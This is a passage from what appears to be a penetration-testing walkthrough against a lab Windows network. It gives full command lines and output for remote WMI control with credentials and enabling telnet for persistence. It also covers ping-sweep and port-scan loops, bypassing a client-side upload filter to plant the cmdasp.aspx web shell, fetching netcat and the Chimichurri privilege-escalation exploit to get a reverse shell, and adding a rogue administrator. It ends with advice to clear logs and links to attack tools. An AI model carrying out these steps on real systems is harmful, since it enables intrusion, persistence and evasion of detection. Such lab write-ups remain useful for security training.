C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get DefaultIPGateway,DHCPServer,DNSDomain,DNSServerSearchOrder,IPAddress,IPSubnet DefaultIPGateway DHCPServer DNSDomain DNSServerSearchOrder IPAddress IPSubnet {"10.0.1.65"} 10.0.1.65 lab2 {"10.0.1.68"} {"10.0.1.75"} {"255.255.255.192"} {"10.0.1.137"} 10.0.1.137 lab2-intranet {"10.0.1.137"} {"10.0.1.140"} {"255.255.255.248"}10.0.1.75 255.255.255.192 Multihomed machine, that's good sign.
Persistence
Lets try to get a telnet connection
List Services Information
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list AcceptPause=FALSE AcceptStop=FALSE Caption=Application Experience Lookup Service CheckPoint=0 CreationClassName=Win32_Service Description=Processes application compatibility lookup requests for applications as they are launched. DesktopInteract=FALSE DisplayName=Application Experience Lookup Service ErrorControl=Normal ExitCode=0 InstallDate= Name=AeLookupSvc PathName=C:\WINDOWS\system32\svchost.exe -k netsvcs ProcessId=796 ServiceSpecificExitCode=0 ServiceType=Share Process Started=TRUE StartMode=Auto StartName=LocalSystem State=Running Status=OK SystemCreationClassName=Win32_ComputerSystem SystemName=SERVER-2003 TagId=0 WaitHint=0 AcceptPause=FALSE AcceptStop=FALSE Caption=Alerter CheckPoint=0 CreationClassName=Win32_Service Description=Notifies selected users and computers of administrative alerts. If the service is stopped, programs that use administrative alerts will not receive them. If this service is disabled, any services that explicitly depend on it will fail to start. DesktopInteract=FALSE DisplayName=Alerter ErrorControl=Normal ExitCode=1077 InstallDate= Name=Alerter PathName=C:\WINDOWS\system32\svchost.exe -k LocalService ProcessId=0 ServiceSpecificExitCode=0 ServiceType=Share Process Started=FALSE StartMode=Disabled StartName=NT AUTHORITY\LocalService State=Stopped Status=OK SystemCreationClassName=Win32_ComputerSystem SystemName=SERVER-2003 TagId=0 WaitHint=0
Find a specific Service State
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET State,StartMode StartMode State Disabled Stopped
Change start mode of service to automatically start upon boot
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL ChangeStartMode Automatic Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->ChangeStartMode() Method execution successful. Out Parameters: instance of __PARAMETERS { ReturnValue = 0; };
Starting the service
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL StartService Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->StartService() Method execution successful. Out Parameters: instance of __PARAMETERS { ReturnValue = 0; };
Test the connection
*===================================== Welcome to Microsoft Telnet Server. *===================================== C:\Documents and Settings\IWAM_NETASPS>
More Recon & Mapping
Finding new friends to play
Ping Sweep
C:\>FOR /L %i in (1,1,255) do @ping -n 1 10.0.1.%i | find "Reply" Reply from 10.0.1.65: bytes=32 time=2ms TTL=64 Reply from 10.0.1.66: bytes=32 time=4ms TTL=128 Reply from 10.0.1.68: bytes=32 time=6ms TTL=128 Reply from 10.0.1.75: bytes=32 time<1ms TTL=128 Reply from 10.0.1.137: bytes=32 time=31ms TTL=64 Reply from 10.0.1.138: bytes=32 time<1ms TTL=128 Reply from 10.0.1.140: bytes=32 time<1ms TTL=128
New Hosts Found
10.0.1.66 and 10.0.1.68
Let's use Nbtstat to gather NetBIOS information
10.0.1.66
C:>nbtstat -a 10.0.1.66 Local Area Connection: Node IpAddress: [10.0.1.75] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- WINDOWS-7 <00> UNIQUE Registered LAB2 <00> GROUP Registered WINDOWS-7 <20> UNIQUE Registered LAB2 <1E> GROUP Registered LAB2 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-0C-29-03-FA-DF Local Area Connection 2: Node IpAddress: [10.0.1.140] Scope Id: [] Host not found.
10.0.1.68
C:\>nbtstat -a 10.0.1.68 Local Area Connection: Node IpAddress: [10.0.1.75] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER-2008 <00> UNIQUE Registered LAB2 <00> GROUP Registered LAB2 <1C> GROUP Registered SERVER-2008 <20> UNIQUE Registered LAB2 <1B> UNIQUE Registered MAC Address = 00-0C-29-5D-09-FD Local Area Connection 2: Node IpAddress: [10.0.1.140] Scope Id: [] Host not found.
Let's find out more about IP 10.0.1.68 - SEVER-2008
Port Scan
C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.68 %i | find "[%i]" Server appears to be running on port(s) [53] Server appears to be running on port(s) [80] Server appears to be running on port(s) [88] Server appears to be running on port(s) [135] Server appears to be running on port(s) [139] Server appears to be running on port(s) [389] Server appears to be running on port(s) [445] Server appears to be running on port(s) [593] Server appears to be running on port(s) [636] Server appears to be running on port(s) [3268] Server appears to be running on port(s) [3389] Server appears to be running on port(s) [5357]
Banner Grabbing port 80 with Telnet
C:\>telnet 10.0.1.68 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Content-Length: 2221 Content-Type: text/html Last-Modified: Wed, 01 Jun 2011 07:31:37 GMT Accept-Ranges: bytes ETag: "2e5fd4f02d20cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Wed, 01 Jun 2011 08:44:41 GMT Connection: close Connection to host lost.
Check the allowed Options
C:\>telnet 10.0.1.68 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Allow: OPTIONS, TRACE, GET, HEAD, POST Server: Microsoft-IIS/7.0 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Wed, 01 Jun 2011 08:45:35 GMT Connection: close Content-Length: 0 Connection to host lost.
Connecting to the Server-2003 machine through Remote Desktop and using the browser to get more information
Let's take a look at the web page source
...
<form onSubmit="javascript: return CheckTypes(this, new Array('.jpg', '.jpeg', '.gif', '.bmp'), 'include');" name="myform" id="myform" method="post" action="Multiplefilesupload.aspx" encType="multipart/form-data">
Select only *.jpg, *.jpeg, *.gif, or *.bmp file:
<input id="brr" type="file" name="file1">
<input type="submit" name="SubmitButton" value="Upload">
</form>
...
Now there is a good idea, using JavaScript for file upload validation
Pivoting
Disabling Scripts on the browser
Download cmdasp.aspx from FTP
C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3 Connected to 172.16.0.3. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 50 allowed. 220-Local time is now 11:02. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. User (172.16.0.3:(none)): Bob 331 User Bob OK. Password required Password: 230-User Bob has group access to: 1001 230 OK. Current directory is / ftp> get cmdasp.aspx 200 PORT command successful 150 Connecting to port 5001 226-File successfully transferred 226 0.000 seconds (measured here), 10.03 Mbytes per second ftp: 1442 bytes received in 0.02Seconds 90.13Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 2 kbytes. 221 Logout.
Upload the cmdasp.aspx shell
List Installed OS Hotfixes and Service Packs
wmic /output:C:\inetpub\wwwroot\UploadedFiles\hotfixes.htm qfe list
List files in C:\inetpub\wwwroot\UploadedFiles
View hot fixes
Download netcat and Chimichurri
C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3 Connected to 172.16.0.3. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 50 allowed. 220-Local time is now 11:02. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. User (172.16.0.3:(none)): Bob 331 User Bob OK. Password required Password: 230-User Bob has group access to: 1001 230 OK. Current directory is / ftp> bin 200 TYPE is now 8-bit binary ftp> get nc.exe 200 PORT command successful 150-Connecting to port 5001 150 60.0 kbytes to download 226-File successfully transferred 226 0.094 seconds (measured here), 0.63 Mbytes per second ftp: 61440 bytes received in 0.08Seconds 777.72Kbytes/sec. ftp> get Chimichurri.exe 200 PORT command successful 150-Connecting to port 5002 150 392.5 kbytes to download 226-File successfully transferred 226 0.679 seconds (measured here), 0.56 Mbytes per second ftp: 401920 bytes received in 0.70Seconds 571.72Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 453 kbytes. 221 Logout.
Upload Chimichurri.exe
Start a Netcat listener with nc.exe -L -p 5555 and Run Chimichurri
Add a new User and assign user to the Administrators group
Check our new User and Password
Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\IWAM_NETASPS>systeminfo /S \\10.0.1.68 /U Lab2\iKuppu /P P4$$w0rd Host Name: SERVER-2008 OS Name: Microsoftr Windows Serverr 2008 Standard OS Version: 6.0.6001 Service Pack 1 Build 6001 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 92573-029-0000095-76373 Original Install Date: 5/21/2011, 6:41:14 AM System Up Time: 2 Days, 18 Hours, 17 Minutes, 17 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2805 Mhz BIOS Version: PTLTD - 6040000 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: pt;Portuguese (Portugal) Time Zone: (GMT-08:00) Pacific Time (US & Canada) Total Physical Memory: 511 MB Available Physical Memory: 140 MB Page File: Max Size: 1,513 MB Page File: Available: 1,170 MB Page File: In Use: 343 MB Page File Location(s): N/A Domain: Lab2.lab Logon Server: N/A Hotfix(s): 3 Hotfix(s) Installed. [01]: KB948609 [02]: KB948610 [03]: KB956250 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: Yes DHCP Server: 10.0.1.65 IP address(es) [01]: 10.0.1.68 [02]: fe80::5963:ac2a:6f8b:53e7
Game Over
Note
Remember to clean up. Clear the logs, remove all the usernames added, remove all the files and tools uploaded, and restore the systems to its initial state.
__________________________________________________________
Tools and exploits used in this scenario
Backtrack 5 R1 - http://www.backtrack-linux.org/
Chimichurri - http://www.argeniss.com/research/Chimichurri.zip
Fpipe v2.1 - http://www.mcafee.com/us/downloads/free-tools/fpipe.aspx
Hydra - http://thc.org/thc-hydra/
John the Ripper - http://www.openwall.com/john//
Web Shell cmdasp.aspx - http://code.google.com/p/fuzzdb/source/browse/trunk/web-backdoors/wbc-v1b/cmdasp.aspx?r=58
Netcat- http://joncraton.org/files/nc111nt.zip
PsExec v1.98 - http://technet.microsoft.com/en-us/sysinternals/bb897553
Samdump2 - http://sourceforge.net/projects/ophcrack/files/samdump2/2.0.1/
Tsql - http://www.freetds.org/
__________________________________________________________
http://blog.commandlinekungfu.com/
http://isc.sans.edu/diary.html?storyid=1229
http://isc.sans.edu/diary.html?storyid=2376
http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf
http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html
http://www.pentester.es/2011/05/unprivileged-network-post-exploitacion.html